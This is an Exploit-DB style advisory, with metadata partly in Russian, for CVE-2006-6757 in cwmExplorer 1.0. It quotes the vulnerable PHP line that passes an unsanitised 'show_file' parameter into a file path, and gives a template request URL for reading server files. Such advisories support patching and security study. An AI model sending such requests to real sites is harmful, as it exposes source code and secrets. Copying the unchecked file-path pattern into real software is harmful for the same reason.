Exploit cwmExplorer 1.0 - 'show_file' Source Code Disclosure

[Exploiter]

EDB-ID

2963

Проверка EDB

1. Пройдено

Автор

AJANN

Тип уязвимости

WEBAPPS

Платформа

ASP

CVE

cve-2006-6757

Дата публикации

2006-12-19

*******************************************************************************************
# Title   :  cwmExplorer 1.0 (show_file) Source Code Disclosure Vulnerability
# Author  :  ajann
# Contact :  :(

*******************************************************************************************

[[ERROR]]]------------------------------------------------------
....
..
$datei = "dirs/".$d."/".$_GET[show_file];
....
..
[[ERROR]]]---------------------------------------------------------

Example:

//[path]/index.php?d=0&show_file=[file]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-19]